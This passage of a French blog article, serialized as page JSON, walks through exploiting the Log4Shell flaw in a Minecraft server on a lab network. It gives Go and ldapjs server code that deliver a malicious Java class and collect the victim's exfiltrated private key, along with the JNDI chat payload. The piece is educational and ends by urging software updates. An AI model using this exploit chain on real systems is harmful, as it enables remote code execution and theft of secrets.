\"net\u002Fhttp\"\n",[400,1039,1040],{"class":402,"line":460},[400,1041,1042],{"class":409},")\n",[400,1044,1045],{"class":402,"line":468},[400,1046,479],{"emptyLinePlaceholder":17},[400,1048,1049,1052,1055,1058,1061,1064,1067,1070,1072],{"class":402,"line":476},[400,1050,1051],{"class":409},"func data",[400,1053,1054],{"class":1014},"H",[400,1056,1057],{"class":409},"andler(_ http.",[400,1059,1060],{"class":1014},"R",[400,1062,1063],{"class":409},"esponse",[400,1065,1066],{"class":1014},"W",[400,1068,1069],{"class":409},"riter, req *http.",[400,1071,1060],{"class":1014},[400,1073,1074],{"class":409},"equest) {\n",[400,1076,1077,1080,1082,1085,1088,1091,1094],{"class":402,"line":482},[400,1078,1079],{"class":409},"    buf, _ := ioutil.",[400,1081,1060],{"class":1014},[400,1083,1084],{"class":409},"ead",[400,1086,1087],{"class":1014},"A",[400,1089,1090],{"class":409},"ll(req.",[400,1092,1093],{"class":1014},"B",[400,1095,1096],{"class":409},"ody)\n",[400,1098,1099,1102,1105,1108,1111,1114,1116,1119,1121],{"class":402,"line":498},[400,1100,1101],{"class":409},"    rdr1 := ioutil.",[400,1103,1104],{"class":1014},"N",[400,1106,1107],{"class":409},"op",[400,1109,1110],{"class":1014},"C",[400,1112,1113],{"class":409},"loser(bytes.",[400,1115,1104],{"class":1014},[400,1117,1118],{"class":409},"ew",[400,1120,1093],{"class":1014},[400,1122,1123],{"class":409},"uffer(buf))\n",[400,1125,1126,1129,1132],{"class":402,"line":506},[400,1127,1128],{"class":409},"    log.",[400,1130,1131],{"class":1014},"P",[400,1133,1134],{"class":409},"rintf(\"secret data: %q\", rdr1)\n",[400,1136,1137],{"class":402,"line":514},[400,1138,969],{"class":409},[400,1140,1141],{"class":402,"line":539},[400,1142,479],{"emptyLinePlaceholder":17},[400,1144,1145],{"class":402,"line":556},[400,1146,1147],{"class":409},"func main() {\n",[400,1149,1150,1153,1156,1159,1162,1165,1168],{"class":402,"line":567},[400,1151,1152],{"class":409},"    fs := 
http.",[400,1154,1155],{"class":1014},"F",[400,1157,1158],{"class":409},"ile",[400,1160,1161],{"class":1014},"S",[400,1163,1164],{"class":409},"erver(http.",[400,1166,1167],{"class":1014},"D",[400,1169,1170],{"class":409},"ir(\".\u002Fjava\"))\n",[400,1172,1173,1176,1178,1181,1184,1187,1189,1192,1194,1197,1199,1202],{"class":402,"line":583},[400,1174,1175],{"class":409},"    http.",[400,1177,1054],{"class":1014},[400,1179,1180],{"class":409},"andle(\"\u002F",[400,1182,1183],{"class":1014},"static",[400,1185,1186],{"class":409},"\u002F\", http.",[400,1188,1161],{"class":1014},[400,1190,1191],{"class":409},"trip",[400,1193,1131],{"class":1014},[400,1195,1196],{"class":409},"refix(\"\u002F",[400,1198,1183],{"class":1014},[400,1200,1201],{"class":409},"\u002F\", fs)) ",[400,1203,1205],{"class":1204},"sJ8bj","\u002F\u002F 1\n",[400,1207,1208,1210,1212,1215,1217,1220,1222,1225],{"class":402,"line":588},[400,1209,1175],{"class":409},[400,1211,1054],{"class":1014},[400,1213,1214],{"class":409},"andle",[400,1216,1155],{"class":1014},[400,1218,1219],{"class":409},"unc(\"\u002Fdata\", data",[400,1221,1054],{"class":1014},[400,1223,1224],{"class":409},"andler) ",[400,1226,1227],{"class":1204},"\u002F\u002F 2\n",[400,1229,1230],{"class":402,"line":603},[400,1231,479],{"emptyLinePlaceholder":17},[400,1233,1234,1237,1240],{"class":402,"line":608},[400,1235,1236],{"class":409},"    println(\"waiting ",[400,1238,1239],{"class":1014},"for",[400,1241,1242],{"class":409}," secret data\")\n",[400,1244,1245,1247,1250,1253,1255,1258,1260,1263,1266],{"class":402,"line":654},[400,1246,1175],{"class":409},[400,1248,1249],{"class":1014},"L",[400,1251,1252],{"class":409},"isten",[400,1254,1087],{"class":1014},[400,1256,1257],{"class":409},"nd",[400,1259,1161],{"class":1014},[400,1261,1262],{"class":409},"erve(\":",[400,1264,1265],{"class":1014},"8080",[400,1267,1268],{"class":409},"\", nil)\n",[400,1270,1271],{"class":402,"line":660},[400,1272,969],{"class":409},[343,1274,1275],{},"Ce bout de 
code en go fait tourner un serveur http qui fait deux choses simples :",[1277,1278,1279,1292],"ol",{},[1280,1281,1282,1283,1286,1287,1289,1290],"li",{},"Il sert sur la route ",[357,1284,1285],{},"\u002Fstatic"," le fichier ",[357,1288,979],{}," qui est dans le dossier ",[357,1291,396],{},[1280,1293,1294,1295,1298,1299,1302],{},"Il écoute sur la route ",[357,1296,1297],{},"\u002Fdata"," et affiche le ",[357,1300,1301],{},"body"," de la requête. C’est sur cet endpoint qu’on\nrecevra la clé privée envoyée par le script java malveillant.",[343,1304,1305,1306,980],{},"Enfin on démarre un serveur ldap. Pour cela, on utilise le package npm\n",[1307,1308,1312],"a",{"href":1309,"rel":1310},"https:\u002F\u002Fwww.npmjs.com\u002Fpackage\u002Fldapjs",[1311],"nofollow","ldapjs",[392,1314,1319],{"className":1315,"code":1317,"language":1318},[1316],"language-text","const ldap = require('ldapjs');\n\nconst server = ldap.createServer();\n\nserver.search('', (req, res, next) => {\n    const obj = {\n        dn: req.dn.toString(),\n        attributes: {\n            javaClassName: \"MinecraftRCE\",\n            javaCodeBase: \"\u003Chttp:\u002F\u002F192.168.1.22:8080\u002Fstatic\u002F>\",\n            objectClass: \"javaNamingReference\",\n            javaFactory: \"MinecraftRCE\",\n        }\n    };\n\n    res.send(obj);\n\n    res.end();\n});\n\nserver.listen(1389, () => {\n    console.log('LDAP server listening at %s', server.url);\n});\n","text",[357,1320,1317],{"__ignoreMap":11},[343,1322,1323],{},"On lance ce serveur avec node :",[343,1325,1326],{},[357,1327,1328],{},"node index.js",[343,1330,1331],{},"Tout est en place pour passer à l’action. On se connecte au serveur minecraft comme un joueur normal\net on peut déclencher l’attaque. 
Pour ce faire il suffit de taper dans le chat le texte suivant :",[343,1333,1334],{},[357,1335,1336],{},"${jndi:ldap:\u002F\u002F192.168.1.22:1389}",[343,1338,1339],{},[371,1340],{"alt":11,"src":1341},"\u002Fimages\u002Ffinal-hacked.png",[343,1343,1344,1345,1347],{},"C’est cette chaîne de caractères qui sera envoyée à log4j. Aussitôt qu’on a appuyé sur entrée on\nreçoit bien la requête avec la clé privée de la victime sur notre endpoint http ",[357,1346,1297],{},".",[343,1349,1350],{},[371,1351],{"alt":11,"src":1352},"\u002Fimages\u002Fconsole-hacked.png",[343,1354,1355],{},"On reçoit même la requête 3 fois, sans doute parce que la chaîne est loggée 3 fois dans le code de\nminecraft.",[343,1357,1358],{},"Nous avons donc démontré que la faille log4shell peut facilement être exploitée. Dans notre exemple\nassez simple on s’est contenté de lire la clé privée, mais ce n’est pas la seule exploitation\npossible. C’est pourquoi il est fortement recommandé de garder ses logiciels à jour.",[343,1360,1361],{},[1307,1362,1363],{"href":1363,"rel":1364},"https:\u002F\u002Fsecurity.googleblog.com\u002F2021\u002F12\u002Funderstanding-impact-of-apache-log4j.html",[1311],[343,1366,1367],{},[1307,1368,1369],{"href":1369,"rel":1370},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=7qoPDq41xhQ",[1311],[343,1372,1373],{},[1307,1374,1375],{"href":1375,"rel":1376},"https:\u002F\u002Fnews.fr-24.com\u002Ftechnology\u002F591640.html",[1311],[343,1378,1379],{},[1307,1380,1381],{"href":1381,"rel":1382},"https:\u002F\u002Fstackoverflow.blog\u002F2022\u002F01\u002F19\u002Fheres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone\u002F?utm_source=Iterable&utm_medium=email&utm_campaign=the_overflow_newsletter",[1311],[343,1384,1385],{},[1307,1386,1387],{"href":1387,"rel":1388},"https:\u002F\u002Fsecurityboulevard.com\u002F2021\u002F12\u002Flog4shell-jndi-injection-via-attackable-log4j\u002F",[1311],[1390,1391,1392],"style",{},"html pre.shiki code 
.szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .s7hpK, html code.shiki .s7hpK{--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}",{"title":11,"searchDepth":12,"depth":12,"links":1394},[1395,1396,1397],{"id":340,"depth":12,"text":341},{"id":348,"depth":12,"text":349},{"id":363,"depth":12,"text":364},"2022-03-24","Log4j est une des librairies de log parmi les plus utilisées par les applications codées en java. 
La liste des entreprises qui l'utilisent est longue","fr",{},"\u002Farticles\u002F2022-03-24-comprendre-et-exploiter-la-faille-log4shell",{"title":333,"description":1399},"articles\u002F2022-03-24-comprendre-et-exploiter-la-faille-log4shell",[1406],"Tech","Ik9XPVlsdrX7iS4nx7RL8IOua4PFduRgPAuqadw6oo0",1778159244031]